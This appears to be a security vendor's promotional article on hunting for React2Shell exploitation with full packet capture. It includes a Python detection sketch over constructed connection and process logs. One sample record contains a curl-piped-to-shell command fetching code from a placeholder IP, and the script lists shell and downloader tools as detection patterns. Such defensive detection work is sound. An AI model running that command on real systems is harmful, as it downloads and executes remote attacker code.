PacketWatch 247 Cyber

As organizations struggle to understand the impact of the React2Shell vulnerability, PacketWatch threat hunters have published a blog article, “Responding to React2Shell,” detailing their experience with React2Shell in the wild, including the attack flow, proof-of-concept, IOCs, and observed behaviors.

With threats like React2Shell, deploying endpoint detection and response (EDR), web application firewalls (WAF), and application patches can reduce exposure going forward, but none of these controls will tell you whether the vulnerability was already exploited before they were in place. Answering that question takes a different set of tools and proven cyber incident response expertise.

“Network traffic originating from external sources is often not seen by, or effectively parsed by, conventional security tools,” says John Bornt, chief security officer and vice president of cyber operations and incident response at PacketWatch. “This lack of visibility allows threat actors using exploits like React2Shell to successfully compromise an organization’s Internet-facing resources without immediately triggering alerts for the security operations team to triage.”

The React2Shell vulnerability enables remote code execution on servers running vulnerable versions of React or Next.js, giving threat actors anywhere an “open door” through which to deliver arbitrary malicious payloads. Because these frameworks are so widely deployed, React2Shell exposes a far larger population of Internet-facing corporate systems than most other known vulnerabilities.

Organizations monitoring their network should make sure that their visibility is not one-dimensional. HTTP headers, firewall logs, Zeek signatures, or NetFlow data alone are not enough: each records a summary of a connection (or, for signatures, only what a rule already matches), not the bytes the exploit actually sent. Full packet capture provides a complete recording (PCAP) of network activity, much as a DVR does for television, so network threat hunters can “rewind” to the moment of exploitation and look for subtle suspicious patterns in the payloads themselves.

Some of the suspicious activities that PacketWatch analysts observed in the wild in React2Shell-exploited environments included:

  • Suspicious processes spawning from Node.js
  • Suspicious network traffic to malicious external IPs (C2)
  • Suspicious network connections from the React server to other internal assets
  • Scanning from the React server
  • Malware installations and malicious code running on the React server
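
As an added example (not PacketWatch's tooling or code from the article), the following Python sketch runs the kinds of checks a hunter would apply for the behaviours listed above over constructed telemetry: Zeek conn.log-style connection records of the sort derived from packet capture, plus EDR-style process records for the Node.js spawn case. The React server address, the internal range, the baseline of expected internal connections, the allowlisted external host, the field order, and every sample record are assumptions made for this example, not data from the article.

```python
"""Hunting for post-exploitation behaviour of a compromised React/Next.js server.

Added example, not PacketWatch code. Everything below is assumed for illustration:
the React server address, the internal range, the baseline of expected internal
connections, the Zeek conn.log-style field order (ts src sport dst dport proto
conn_state) and the EDR-style (parent_image, child_image, cmdline) process records.
"""
from ipaddress import ip_address, ip_network
from os.path import basename

INTERNAL = ip_network("10.0.0.0/8")                 # assumed corporate range
REACT_SERVER = ip_address("10.0.5.20")               # assumed React/Next.js host
EXPECTED_INTERNAL = {("10.0.9.9", 5432)}              # assumed baseline: app -> its database
EXTERNAL_ALLOWLIST = {"203.0.113.10"}                 # assumed: e.g. a package registry mirror
FAILED_STATES = {"REJ", "S0", "RSTO", "RSTOS0"}        # Zeek conn_state values: refused/unanswered
SHELLS_AND_DOWNLOADERS = {"sh", "bash", "dash", "curl", "wget", "nc", "python3", "perl"}

# Constructed sample connection records: ts src sport dst dport proto conn_state
SAMPLE_CONN_LOG = """\
1733900000.10 203.0.113.45 51234 10.0.5.20 443 tcp SF
1733900001.20 10.0.5.20 40001 198.51.100.7 8443 tcp SF
1733900002.00 10.0.5.20 40002 10.0.5.21 445 tcp REJ
1733900002.10 10.0.5.20 40003 10.0.5.22 445 tcp REJ
1733900002.20 10.0.5.20 40004 10.0.5.23 445 tcp S0
1733900002.30 10.0.5.20 40005 10.0.5.24 22 tcp REJ
1733900002.40 10.0.5.20 40006 10.0.5.25 3389 tcp S0
1733900003.00 10.0.5.20 40007 10.0.5.30 22 tcp SF
1733900030.00 10.0.5.20 40008 10.0.9.9 5432 tcp SF
1733900040.00 10.0.5.20 40009 10.0.9.9 5432 tcp SF
"""

# Constructed sample EDR-style process records: (parent_image, child_image, child_cmdline)
SAMPLE_PROCESS_EVENTS = [
    ("/usr/bin/node", "/usr/bin/node", "node /app/.next/standalone/server.js"),
    ("/usr/bin/node", "/bin/sh", "sh -c 'curl -s http://198.51.100.7:8443/x | sh'"),
    ("/bin/sh", "/usr/bin/curl", "curl -s http://198.51.100.7:8443/x"),
]


def parse_conn_log(text):
    """Parse whitespace-separated conn records into dicts with typed fields."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, sport, dst, dport, proto, state = line.split()
        records.append({"ts": float(ts), "src": ip_address(src), "sport": int(sport),
                        "dst": ip_address(dst), "dport": int(dport),
                        "proto": proto, "state": state})
    return records


def find_node_spawns(events):
    """A Node.js server process has no business spawning a shell or downloader."""
    return [(child, cmd) for parent, child, cmd in events
            if basename(parent) == "node" and basename(child) in SHELLS_AND_DOWNLOADERS]


def find_outbound_c2(records, server=REACT_SERVER, allow=EXTERNAL_ALLOWLIST):
    """Connections the server itself initiated to external hosts not on the allowlist."""
    return sorted({(str(r["dst"]), r["dport"]) for r in records
                   if r["src"] == server and r["dst"] not in INTERNAL
                   and str(r["dst"]) not in allow})


def find_lateral(records, server=REACT_SERVER, baseline=EXPECTED_INTERNAL):
    """Successful internal connections from the server outside its known baseline."""
    return sorted({(str(r["dst"]), r["dport"]) for r in records
                   if r["src"] == server and r["dst"] in INTERNAL
                   and r["state"] == "SF"
                   and (str(r["dst"]), r["dport"]) not in baseline})


def find_internal_scan(records, server=REACT_SERVER, threshold=5, window=60.0):
    """Burst of refused/unanswered connections from the server to many distinct
    internal host:port pairs inside a sliding time window (scanning)."""
    attempts = sorted((r["ts"], str(r["dst"]), r["dport"]) for r in records
                      if r["src"] == server and r["dst"] in INTERNAL
                      and r["state"] in FAILED_STATES)
    start = 0
    for end in range(len(attempts)):
        while attempts[end][0] - attempts[start][0] > window:
            start += 1
        targets = {(d, p) for _, d, p in attempts[start:end + 1]}
        if len(targets) >= threshold:
            return sorted(targets)      # first window that crosses the threshold
    return []


def hunt(conn_text=SAMPLE_CONN_LOG, events=SAMPLE_PROCESS_EVENTS):
    """Run every check and return the findings keyed by behaviour."""
    records = parse_conn_log(conn_text)
    return {"node_spawns": find_node_spawns(events),
            "outbound_c2": find_outbound_c2(records),
            "lateral": find_lateral(records),
            "scan_targets": find_internal_scan(records)}


if __name__ == "__main__":
    for name, hits in hunt().items():
        print(f"{name}: {hits}")
```

The connection-level checks work on metadata that NetFlow or firewall logs also carry, which is why they are a starting point rather than the whole hunt; what full packet capture adds is the ability to pull the HTTP request that arrived just before the first outbound connection (the first sample record above) and confirm the exploit payload that the metadata-only checks cannot see. The baseline of expected internal connections is the part that needs tuning per environment, since a React server talking to its own database is normal and only connections outside that set are worth a look.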

“We can see things that others can’t,” said Andrew Oesterheld, senior cybersecurity analyst at PacketWatch. “With full packet capture, we’re able to use raw network data to quickly reverse-engineer exploits and build detections to protect our clients. Within hours of a new exploit being released, we can protect all our managed clients, even before traditional alerts are triggered. That’s the power of proactive threat hunting.”
